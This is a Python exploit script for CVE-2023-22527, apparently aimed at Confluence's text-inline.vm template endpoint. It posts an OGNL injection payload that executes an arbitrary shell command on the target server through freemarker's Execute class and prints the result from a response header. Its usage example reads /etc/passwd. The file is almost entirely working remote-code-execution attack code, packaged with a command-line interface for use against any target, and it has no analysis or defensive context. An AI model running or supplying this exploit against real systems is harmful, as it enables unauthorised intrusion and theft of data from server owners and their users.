# @Time : 2024/1/23 # @Author : jeyiuwai # @File : CVE-2023-22527.py import argparse import requests def exploit(target, cmd): url = f"{target}/template/aui/text-inline.vm" headers = { "Content-Type": "application/x-www-form-urlencoded" } data = r"label='%2b#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(#parameters.x,{})%2b'&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'" + cmd + "'}))" response = requests.post(url, headers=headers, data=data, verify=False) if (response.headers.get("X-Cmd-Response")): print(response.headers.get("X-Cmd-Response")) else: print("No response") def main(): parser = argparse.ArgumentParser( description="Send request with target and cmd parameters", usage="python3 CVE-2023-22527.py --target --cmd \nExample: python3 CVE-2023-22527.py --target http://192.168.11.136:8092 --cmd \"cat /etc/passwd\"" ) parser.add_argument("--target", required=True, help="Target address") parser.add_argument("--cmd", required=True, help="Value for the cmd parameter") args = parser.parse_args() exploit(args.target, args.cmd) if __name__ == "__main__": main()